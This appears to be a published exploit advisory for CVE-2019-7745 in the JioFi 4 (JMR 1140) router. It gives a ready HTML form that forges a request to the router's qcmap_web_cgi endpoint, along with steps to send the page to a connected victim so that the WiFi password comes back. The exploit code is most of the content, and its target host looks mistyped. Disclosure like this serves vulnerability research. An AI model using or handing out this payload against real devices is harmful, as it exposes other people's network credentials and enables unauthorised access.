Jiofi 4 (JMR 1140) WiFi Password Cross Site Request Forgery

Jiofi 4 (JMR 1140) with firmware version Amtel_JMR1140_R12.07 suffers from a WiFi password disclosure cross site request forgery vulnerability.

MD5 | 9324783dffb24179b9a0c8c09adb0446

# Exploit Title: Jiofi 4 (JMR 1140) CSRF To View Wi-fi Password
# Date: 12.02.2019
# Exploit Author: Ronnie T Baby
# Contact:
# Vendor Homepage:
# Hardware Link:
# Category: Hardware (Wifi Router)
# Version: JMR-1140 Firmware v. Amtel_JMR1140_R12.07
# Tested on: Ubuntu 18.04
# CVE: CVE-2019-7745


JioFi 4 jmr1140 Amtel_JMR1140_R12.07 devices allow remote attackers to obtain the Wi-Fi password by making a cgi-in/qcmap_web_cgi Page=GetWiFi_Setting request and then reading the wpa_security_key field.

1. Create a view.html and insert

<script>history.pushState('', '', '/')</script>
<form action="http://jiofi.local.html/cgi-bin/qcmap_web_cgi" method="POST">
<input type="hidden" name="Page" value="GetWiFi_Setting" />
<input type="hidden" name="Mask" value="0" />
<input type="hidden" name="result" value="0" />
<input type="submit" value="Submit request" />

2. Send to victim(who is connected to the wifi network).
3. The response gives the current wifi password.
Example response-


Note- I believe this to work in all other jio routers viz. Jio JMR 540, Jiofi M2 as all share similar web interface. I have not confirmed this.

Related Posts